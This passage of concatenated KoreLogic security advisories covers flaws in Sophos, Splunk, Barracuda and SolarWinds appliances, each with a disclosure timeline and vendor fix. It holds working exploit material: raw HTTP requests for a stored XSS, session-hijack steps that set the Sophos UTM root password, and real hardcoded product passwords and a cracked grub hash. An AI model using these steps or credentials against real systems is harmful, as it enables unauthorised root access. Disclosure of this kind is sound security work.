6. Disclosure Timeline 2017.07.24 - KoreLogic submits vulnerability details to NetEx. 2017.07.24 - NetEx confirms receipt. 2017.08.16 - NetEx informs KoreLogic that this and other reported vulnerabilities have been addressed in the forthcoming release. ETA as of yet undetermined. 2017.09.05 - 30 business days have elapsed since the vulnerability was reported to NetEx. 2017.09.19 - NetEx informs KoreLogic that the forthcoming release 6.1.1 is expected to ship at the end of January 2018. 2017.09.26 - 45 business days have elapsed since the vulnerability was reported to NetEx. 2017.12.01 - 90 business days have elapsed since the vulnerability was reported to NetEx. 2018.01.17 - 120 business days have elapsed since the vulnerability was reported to NetEx. 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release has gone live. 2018.02.08 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2018 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt signature.asc Description: OpenPGP digital signature
KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability Advisory ID: KL-001-2018-001 Publication Date: 2018.01.26 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: Web Gateway Affected Version: 4.4.1 Platform: Embedded Linux CWE Classification: CWE-79: Improper Neutralization of Input During Web Page Generation, CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page Impact: Arbitrary Code Execution Attack vector: HTTP 2. Vulnerability Description The report scheduler menu within the management portal contains a persistent cross site scripting vulnerability. This vulnerability can be used to target other users of the same portal. 3. Technical Description A valid session is required to create the report with the persistent cross site scripting payload attached. An example attack payload has been included below. This payload is designed to trigger an alert box with the number one being displayed. POST /index.php?c=report_scheduler HTTP/1.1 Host: 1.3.3.7 Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 1190 DNT: 1 Connection: close action=save=016a16896568739c11955632068abddd=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d HTTP/1.1 200 OK Date: Sat, 29 Jul 2017 16:05:25 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41 {"status":0,"statusMsg":"Settings saved"} The URL-encoded input being passed in input parameter can be decoded to a array containing a single JSON buffer. [{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1", "sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday", "txt_schedule_name": "testalert(1);", "cb_activate_schedule": "yes", "recipients": "test@test.asdasd", "schedule_id": "dGVzdA==", "owner": "admin"}] Within the JSON buffer is a key called txt_schedule_name. The value for this key is the name of the scheduled report. This value is included in the report schedule list. "txt_schedule_name": "testalert(1);" The HTML tags are then stored. When the report schedule is viewed, the resulting JSON is sent as content-type text/html instead of application/json, causing the browser to execute any unescaped javascript it contains. The output is HTML-encoded with the exception of the txt_schedule_name: value which is not sanitized, and the payload triggers. POST /index.php?c=report_scheduler HTTP/1.1 Host: 1.3.3.7 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 81 DNT: 1 Connection: close action=load=name=asc=016a16896568739c11955632068abddd HTTP/1.1 200 OK Date: Sat, 29 Jul 2017 16:06:38 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private,
KL-001-2017-022 : Splunk Local Privilege Escalation
KL-001-2017-022 : Splunk Local Privilege Escalation Title: Splunk Local Privilege Escalation Advisory ID: KL-001-2017-022 Publication Date: 2017.11.03 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-022.txt 1. Vulnerability Details Affected Vendor: Splunk Affected Product: Splunk Enterprise Affected Version: 6.6.x Platform: Embedded Linux CWE Classification: CWE-280: Improper Handling of Insufficient Permissions or Privileges Impact: Privilege Escalation Attack vector: Local 2. Vulnerability Description Splunk can be configured to run as a non-root user. However, that user owns the configuration file that specifies the user to run as, so it can trivially gain root privileges. 3. Technical Description Splunk runs multiple daemons and network listeners as root by default. It can be configured to drop privileges to a specified non-root user at startup such as user splunk, via the SPLUNK_OS_USER variable in the splunk-launch.conf file in $SPLUNK_HOME/etc/ (such as /opt/splunk/etc/splunk-launch.conf). However, the instructions for enabling such a setup call for chown'ing the entire $SPLUNK_HOME directory to that same non-root user. For instance: http://docs.splunk.com/Documentation/Splunk/6.6.2/Installation/RunSplunkasadifferentornon-rootuser "4. Run the chown command to change the ownership of the splunk directory and everything under it to the user that you want to run the software. chown -R splunk:splunk $SPLUNK_HOME" Therefore, if an attacker gains control of the splunk account, they can modify $SPLUNK_HOME/etc/splunk-launch.conf to remove/unset SPLUNK_OS_USER so that the software will retain root privileges, and place backdoors under $SPLUNK_HOME/bin/, etc. that will take malicious actions as user root the next time Splunk is restarted. 4. Mitigation and Remediation Recommendation The vendor has published a mitigation for this vulnerability at: https://www.splunk.com/view/SP-CAAAP3M 5. Credit This vulnerability was discovered by Hank Leininger of KoreLogic, Inc. 6. Disclosure Timeline 2017.08.17 - KoreLogic submits vulnerability details to Splunk. 2017.08.17 - Splunk confirms receipt. 2017.08.22 - Splunk notifies KoreLogic that the issue has been assigned an internal ticket and will be addressed. 2017.09.29 - 30 business days have elapsed since the vulnerability was reported to Splunk. 2017.10.17 - KoreLogic requests an update from Splunk. 2017.10.18 - Splunk informs KoreLogic that they will issue an advisory on October 28th. 2017.10.23 - 45 business days have elapsed since the vulnerability was reported to Splunk. 2017.10.30 - Splunk notifies KoreLogic that the advisory is published. 2017.11.03 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt signature.asc Description: OpenPGP digital signature
KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions
KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions Title: Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions Advisory ID: KL-001-2017-020 Publication Date: 2017.10.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-020.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: UTM 9 Affected Version: 9.410 Platform: Embedded Linux CWE Classification: CWE-280: Improper Handling of Insufficient Permissions or Privileges Impact: Root Access Attack vector: SSH 2. Vulnerability Description The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, it is possible to list a directory containing a sub-directories whose names are valid session identifiers (SID) and can be used to make requests on behalf of other accounts, such as admin. This allows for escalation to root privilege. 3. Technical Description 1. Obtain the a privileged session token $ ssh loginuser@1.3.3.7 loginuser@1.3.3.7's password: Sophos UTM (C) Copyright 2000-2016 Sophos Limited and others. All rights reserved. Sophos is a registered trademark of Sophos Limited and Sophos Group. All other product and company names mentioned are trademarks or registered trademarks of their respective owners. For more copyright information look at /doc/astaro-license.txt or http://www.astaro.com/doc/astaro-license.txt NOTE: If not explicitly approved by Sophos support, any modifications done by root will void your support. loginuser@[redacted]:/home/login > cd /var/confd/var/sessions/ loginuser@[redacted]:/var/confd/var/sessions > ls -la total 40 drwxr-xr-x 2 root root 4096 Mar 23 14:53 . drwxr-xr-x 5 root root 4096 Mar 19 16:06 .. -rw-r--r-- 1 root root 359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC -rw-r--r-- 1 root root5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock -rw-r--r-- 1 root root 369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk -rw-r--r-- 1 root root 35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock -rw-r--r-- 1 root root 367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP -rw-r--r-- 1 root root 10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock -rw-r--r-- 1 root root 370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN -rw-r--r-- 1 root root5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock 2. Set the root password POST /webadmin.plx HTTP/1.1 Host: 1.3.3.7: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 Content-Type: application/json; charset=UTF-8 Referer: https://1.3.3.7:/ Content-Length: 418 Cookie: SID=xZzeOIhVClqKYsmCKHrN DNT: 1 Connection: close {"objs": [{"ack": null, "elements": {"root_pw_1": "newroot", "root_pw_2": "newroot", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "xZzeOIhVClqKYsmCKHrN", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false} HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 14:57:19 GMT Server: Apache Expires: Thursday, 01-Jan-1970 00:00:01 GMT Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 24690 {"SID":"xZzeOIhVClqKYsmCKHrN","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba","browser":"gecko","RID":"1490305723111_0.8089407793028881","js":"cache_update();if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["xZzeOIhVClqKYsmCKHrN","5",[]],"globals":["SID","backend_version","backend_objects_update"],"objs":[{"success":[{"text":"Shell user password(s) set successfully."}],"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba", [snip] "_cookie":null,"wdebug":0} 3. Look for success message. "objs":[{"success":[{"text":"Shell user password(s) set successfully."}] 4. Profit. loginuser@[redacted]:/home/login > su Password: [redacted]:/home/login # id uid=0(root) gid=0(root) groups=0(root),890(xorp) 4.
KL-001-2017-014 : Barracuda WAF Support Tunnel Hijack
KL-001-2017-014 : Barracuda WAF Support Tunnel Hijack Title: Barracuda WAF Support Tunnel Hijack Advisory ID: KL-001-2017-014 Publication Date: 2017.07.06 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-014.txt 1. Vulnerability Details Affected Vendor: Barracuda Affected Product: Web Application Firewall V360 Affected Version: Firmware v8.0.1.014 Platform: Embedded Linux CWE Classification: CWE-304: Missing Critical Step In Authentication Impact: Remote Access Attack vector: DNS, SSH 2. Vulnerability Description During the creation of a tunnel connection to barracuda support, the code creating the tunnels fails to: 1) Validate DNS Records, 2) Validate SSH Host Key, and 3) Transmit Public SSH Key over an encrypted, verified channel. 3. Technical Description file: /usr/local/bin/support-tunnel The first host added to the available remote hosts is done through using DNS resolution on support01.barracudanetworks.com. If an attacker can control DNS, it is possible to subvert network traffic by creating records that will resolve to an attacker's IP address. [snip] sub remote_hosts() { my $central = 'support01.barracudanetworks.com'; my @hosts; my $host = resolv_host($central) || $central; push @hosts, { 'ssh' => { 'host' => $host, 'port' => 22 }, 'web' => { 'host' => $host, 'port' => 80 }, }; push @hosts, { 'ssh' => { 'host' => '64.235.147.77', 'port' => 22 }, 'web' => { 'host' => '64.235.147.77', 'port' => 80 }, }; push @hosts, { 'ssh' => { 'host' => '64.235.154.112', 'port' => 22 }, 'web' => { 'host' => '64.235.154.112', 'port' => 80 }, }; return @hosts; } # remote_hosts [snip] The appliance will send a URL-encoded copy of the public key using HTTP. sub tunnel_post_key() { my $host= shift; my $port= shift; my $serial = shift; my $pubkey = shift; [snip] $url= sprintf('/tunnel-broker?serial=%s=%s=%s=%s=%s', $serial, Digest::MD5::md5_hex($serial), url_escape($pubkey), Digest::MD5::md5_hex($pubkey), url_escape(VERSION)); # # Write an HTTP request. # $req= "GET $url HTTP/1.0\r\nHost: $host\r\n\r\n"; do { $retval = aio_write($sock, $req); } while ($retval == AIO_WOULDBLOCK && $stop > time); if ($retval != AIO_SUCCESS) { throw(SYSTEM_EXCEPTION, "aio_write($addr:$port, $req): $!"); aio_close($sock); return undef; } [snip] return 1; } # tunnel_post_key It should be noted that the appliance is shipped with a default key (pvt_md5:194d9a5167153e1137134e1896d67b47,pub_md5:62c3a6e160cc501f2ffa2d1434176e93) but will generate and submit a new key should the default key no longer exist. This happens in the ssh_key_path function. Finally, the appliance specifically sets StrictHostKeyChecking to no. This instructs the ssh client to ignore any SSH host-key mismatch and allows an attacker to more easily leverage their own SSH server for attacks. sub ssh_command_args($\;$$) { my $sshcmd = shift; my $serialref = shift; my $sshkey = shift; my $sshhost = shift || 'support01.barracudanetworks.com'; my $sshport = shift || 22; my $lsshport= shift || local_ssh_port || 22; my $lwebport= shift || local_web_port || 8000; my $lsslvpnport = shift; if( get_product() eq "bvs" ) { $lsslvpnport = local_sslvpn_port || 443 if !$lsslvpnport; } my @version = ssh_version_of($sshcmd); my (@args, $has_unixfwd, $has_exitonfwdfailure, $has_defineremotehost); $has_unixfwd= ($version[0] > 4 || ($version[0] == 4 && $version[1] >= 4)); $has_exitonfwdfailure = ($version[0] > 4 || ($version[0] == 4 && $version[1] >= 4)); $has_defineremotehost = ($version[0] >= 4); push @args, '-T'; # Don't allocate a TTY push @args, '-' . ('v' x want_verbose) # Passthru verbosity if want_verbose; push @args, '-o', 'StrictHostKeyChecking=no'; # Ignore Support01 host key (bad idea?) push @args, '-i', $sshkey; push @args, '-o',
KL-001-2017-015 : Solarwinds LEM Hardcoded Credentials
KL-001-2017-015 : Solarwinds LEM Hardcoded Credentials Title: Solarwinds LEM Hardcoded Credentials Advisory ID: KL-001-2017-015 Publication Date: 2017.07.06 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-015.txt 1. Vulnerability Details Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-798: Use of Hard-coded Credentials Impact: Unintended Access Attack vector: Local 2. Vulnerability Description The appliance contains multiple hardcoded passwords and hash digests. 3. Technical Description # grep "password" /usr/local/jetty/scripts/certs/openssl.cnf output_password= QDXTCDD2nJIU # grep "password" /usr/local/jetty/scripts/certs/openssl.cnf.org output_password= QDXTCDD2nJIU # grep "password" /usr/local/contego/scripts/certs/openssl.cnf output_password= QDXTCDD2nJIU # grep -i "password" /usr/local/jetty/etc/jetty-ssl.xml q4ROVdYYsV5M q4ROVdYYsV5M q4ROVdYYsV5M # grep -i "password" /usr/local/contego/scripts/indepth-backup.pl my $PASSWORD = "omgcontegorox"; # grep -i "password" /usr/local/contego/scripts/database/pgsql/flow.sql CREATE ROLE trigeo WITH CREATEDB LOGIN PASSWORD 'rootme'; CREATE ROLE contego WITH CREATEDB LOGIN PASSWORD 'reports'; //Empty Password # grep -i "password" /usr/local/contego/run/manager/toolconfig/toolstore.script CREATE USER SA PASSWORD DIGEST 'd41d8cd98f00b204e9800998ecf8427e' # grep -i "password" /usr/local/contego/run/indepth.conf InDepthMaintenPassword=tVyf+rPBho7S0WOd/29MPg\=\= InDepthManagerPassword=zhZi52gTxKbMKTzgdfBtMQ\=\= // cracks to "welcome" without quotes # grep -i "password" /usr/local/contego/run/tomcat/conf/tomcat-users.xml # grep -i "password" /usr/local/contego/run/system.conf archive.password=omgcontegorox backup.password=omgcontegorox logbackup.password=omgcontegorox # grep -i "password" /usr/local/contego/run/daemon-args.pl my $tls = "-Djavax.net.ssl.keyStore=/usr/local/contego/scripts/certs/.keystore -Djavax.net.ssl.keyStorePassword=q4ROVdYYsV5M -Djavax.net.ssl.trustStore=/usr/local/contego/scripts/certs/.truststore -Djavax.net.ssl.trustStorePassword=q4ROVdYYsV5M"; # grep -i "password" /usr/local/contego/run/manager.conf PSQLPassword=aNErCbdTvwaXxnusqVsNCQ\=\= ForensicPassword=BosMXyGmaT/ej+S3GU6fRQ\=\= # grep -i "password" /var/rawdata/cores/solr.conf query_password=tObzgVmmszuKGZ40W+PO/Q== //hardcoded md5 # grep -i "password" /var/alertdata/hsql/alertdb.script CREATE USER SA PASSWORD DIGEST 'fe42a787c40ad4110affab25e8bad4ae' CREATE USER "trigeo" PASSWORD DIGEST '54837f887425d1eda4d0ddcee6c2d3fc' 4. Mitigation and Remediation Recommendation The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at: https://support.solarwinds.com/Success_Center/Log_Event_Manager_(LEM)/Log_and_Event_Manager_LEM_6-3-1_Hotfix_5_ReadMe http://downloads.solarwinds.com/solarwinds/Release/HotFix/SolarWinds-LEM-v6.3.1-Hotfix5.zip 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. and Joshua Hardin. 6. Disclosure Timeline 2017.04.06 - KoreLogic submits vulnerability report and PoC to Solarwinds contact. 2017.05.15 - Solarwinds notifies KoreLogic that a hotfix addressing this issue will be available at the end of June. 2017.05.18 - 30 business days have elapsed since this issue was reported. 2017.06.09 - 45 business days have elapsed since this issue was reported. 2017.06.29 - Solarwinds releases hotfix. 2017.07.06 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at:
KL-001-2017-012 : Barracuda WAF Grub Password Complexity
KL-001-2017-012 : Barracuda WAF Grub Password Complexity Title: Barracuda WAF Grub Password Complexity Advisory ID: KL-001-2017-012 Publication Date: 2017.07.06 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-012.txt 1. Vulnerability Details Affected Vendor: Barracuda Affected Product: Web Application Firewall V360 Affected Version: Firmware v8.0.1.014 Platform: Embedded Linux CWE Classification: CWE-259: Use of Hard-coded Password Impact: Privileged Access Attack vector: Password Cracking 2. Vulnerability Description The grub password for all V360 virtual appliances is four characters in length and, as a result, may be trivially easy to crack. 3. Technical Description # grep "pbkdf2" grub.cfg password_pbkdf2 root grub.pbkdf2.sha512.1.CA568B32B7E1F9A8ADC73224CD8AD1085B23FF5B69558D92E70961F4DEE3F5844CC4E3FC8FC4CBDB0941AC682B52DE64343F6847DF8AD480597B49EA65F48B41.0314A76ADA4989857110B3177617AECF8D38F99E417DCE2B1A289AD5F48C0DFC4969E76E10175399E8978DDE5DFD4B6E7EE808CD00CD6CA43512E92C2EB1D63A # This hash cracks to: bimg 4. Mitigation and Remediation Recommendation The vendor has patched this vulnerability in the lastest virtual appliance release. 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. and Joshua Hardin. 6. Disclosure Timeline 2016.12.20 - KoreLogic sends vulnerability report and PoC to Barracuda. 2016.12.21 - Barracuda acknowledges receipt of the vulnerability report. 2017.01.09 - Barracuda informs KoreLogic that they are working on remediation for this issue. 2017.01.26 - Barracuda asks for additional time beyond the standard 45 business day embargo to address this and other issues reported by KoreLogic. 2017.02.27 - 45 business days have elapsed since the issue was reported. 2017.04.10 - 75 business days have elapsed since the issue was reported. 2017.05.15 - 100 business days have elapsed since the issue was reported. 2017.05.24 - Barracuda updates KoreLogic on the status of the remediation efforts. 2017.06.13 - 120 business days have elapsed since the issue was reported. 2017.06.27 - Barracuda informs KoreLogic that the issue has been fixed in the latest release of the WAF virtual appliance. 2017.07.06 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt signature.asc Description: OpenPGP digital signature
KL-001-2017-011 : Barracuda WAF Internal Development Credential Disclosure
KL-001-2017-011 : Barracuda WAF Internal Development Credential Disclosure Title: Barracuda WAF Internal Development Credential Disclosure Advisory ID: KL-001-2017-011 Publication Date: 2017.07.06 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-011.txt 1. Vulnerability Details Affected Vendor: Barracuda Affected Product: Web Application Firewall V360 Affected Version: Firmware v8.0.1.014 Platform: Embedded Linux CWE Classification: CWE-489: Leftover Debug Code, CWE-200: Information Exposure Impact: Privileged Access Attack vector: Code Review 2. Vulnerability Description Firmware reversing of the Barracuda Web Application Firewall uncovered development artifacts that should have been removed on the production images. Once the encryption scheme was broken, many QA and development tools were discovered on the affected partitions. Some of these contained sensitive information such as authentication credentials used by internal developers. 3. Technical Description root@(none):/realroot/root# grep -ri "bospw" *|more newfile/lib/Stub.pm:'BOSPW' => undef, newfile/lib/Stub.pm:my $bospw = $self->_retrieve_bos_pw(); newfile/lib/Stub.pm:$self->_set_BOSPW($bospw); newfile/lib/Stub.pm: my $bospw = Postbuild::get_bos_pw(); newfile/lib/Stub.pm: my $url = "https://$bospw\@ops.barracudanetworks.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$vm; platform=$platform=$bdvers"; newfile/lib/Stub.pm: $bospw = Postbuild::get_bos_pw(); newfile/lib/Stub.pm: $url = "https://$bospw\@ops.barracudanetworks.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$vm =$platform_country=$ship_code=$bdvers"; newfile/lib/Stub.pm:my $bospw; newfile/lib/Stub.pm:if ( -f "/root/bospw" ) { newfile/lib/Stub.pm:open IN, "/root/bospw"; newfile/lib/Stub.pm:$bospw = ; newfile/lib/Stub.pm:chomp($bospw); newfile/lib/Stub.pm:$bospw = "manufacturing:N3rfH3rders"; newfile/lib/Stub.pm:return $bospw; newfile/lib/Stub.pm:sub _get_BOSPW() { newfile/lib/Stub.pm: return $self->{'BOSPW'}; newfile/lib/Stub.pm:sub _set_BOSPW() { newfile/lib/Stub.pm:my ($self, $BOSPW) = @_; newfile/lib/Stub.pm:$self->{'BOSPW'} = $BOSPW; newfile/lib/Postbuild.pm:my $bospw = "manufacturing:N3rfH3rders"; newfile/lib/Postbuild.pm:if( -f "/root/bospw" ) { newfile/lib/Postbuild.pm:open IN, "/root/bospw"; newfile/lib/Postbuild.pm:$bospw = ; newfile/lib/Postbuild.pm:chomp($bospw); newfile/lib/Postbuild.pm:return $bospw; newfile/lib/Postbuild.pm:my $bospw = get_bos_pw(); newfile/lib/Postbuild.pm: my $url = "https://$bospw\@ops.barracuda.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$vm atform=$platform=$bdvers"; newfile/lib/Postbuild.pm: $url = "https://$bospw\@ops.barracuda.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$ vm=$platform_country=$ship_code=$bdvers"; newfile/lib/Postbuild.pm:my $bospw = get_bos_pw(); newfile/lib/Postbuild.pm:my $url = "https://$bospw\@ops.barracudanetworks.com:443/~order/prod_void.cgi?void_serial=$serial;; postbuild-code-platform-2.tar.gz.integrit:!/root/bospw qaclear:unlink("/root/bospw"); qaclear.2:unlink("/root/bospw"); qapass:my @bospw = ("manufacturing:N3rfH3rders"); qapass:my $extrabospw = injectAndGet("__METHOD__://__POSTBUILDIP__/postbuild/files/os_updates2/root/bospw", { METHOD => [ "http", "https" ], POSTBUILDIP => [ "mfg-postbuild.englab.cudanet.local" ] }, 10 ); qapass:if( defined($extrabospw) ) { qapass:unshift @bospw, split(/\n/, $extrabospw); qapass:$url = "https://__BOSPW__\@__BOSIP__/~order/prod_accept.cgi?serial=$serial=$warehouse=$firmware; qapass:$url = "https://__BOSPW__\@__BOSIP__/~order/prod_accept.cgi?serial=$serial=$firmware;; qapass:if (!defined(injectAndGet($url, { BOSPW => \@bospw, BOSIP => \@bosip } ))) { qapass:$url = "https://__BOSPW__\@__BOSIP__/cgi-bin/get_serial_status.cgi?serial=$serial;; qapass:my $content = injectAndGet($url, { BOSPW => \@bospw, BOSIP => \@bosip } ); qapass:$url = "https://__BOSPW__\@__BOSIP__/cgi-bin/shipping.cgi?option=qadocs=1_label=1_loc=manufacturing=Print_id=$serial=$serial$loc_string;; qapass:$url = "https://__BOSPW__\@__BOSIP__/cgi-bin/shipping.cgi?option=qadocs=1_label=1_code=1_loc=manufacturing=Print_id=$serial=$serial$loc_string;; qapass:if( !defined(injectAndGet($url, { BOSPW => \@bospw, BOSIP => \@bosip })) ) { qapass:$url =
KL-001-2017-009 : Solarwinds LEM Database Listener with Hardcoded Credentials
KL-001-2017-009 : Solarwinds LEM Database Listener with Hardcoded Credentials Title: Solarwinds LEM Database Listener with Hardcoded Credentials Advisory ID: KL-001-2017-009 Publication Date: 2017.04.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-009.txt 1. Vulnerability Details Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-798: Use of Hard-coded Credentials, CWE-284: Improper Access Control Impact: Remote Database Compromise Attack vector: psql 2. Vulnerability Description The Postgres database has default hardcoded credentials. While some security measures were taken to ensure that network connectivity to the Postgres database wouldn't be possible using IPv4, the same measures were not taken for IPv6. 3. Technical Description Reviewing netstat for listening services shows that the postgres service is bound to both IPv6 and IPv6 interfaces. --(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]-- / # netstat -apn|grep postgres tcp0 0 0.0.0.0:54320.0.0.0:* LISTEN 949/postgres tcp6 0 0 :::5432 :::*LISTEN 949/postgres udp0 0 127.0.0.1:58654 127.0.0.1:58654 ESTABLISHED 949/postgres unix 2 [ ACC ] STREAM LISTENING 4622 949/postgres /var/run/postgresql/.s.PGSQL.5432 An iptables REJECT entry exists for IPv4. This prevents remote network connectivity. --(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]-- / # iptables -L|grep postgres REJECT tcp -- 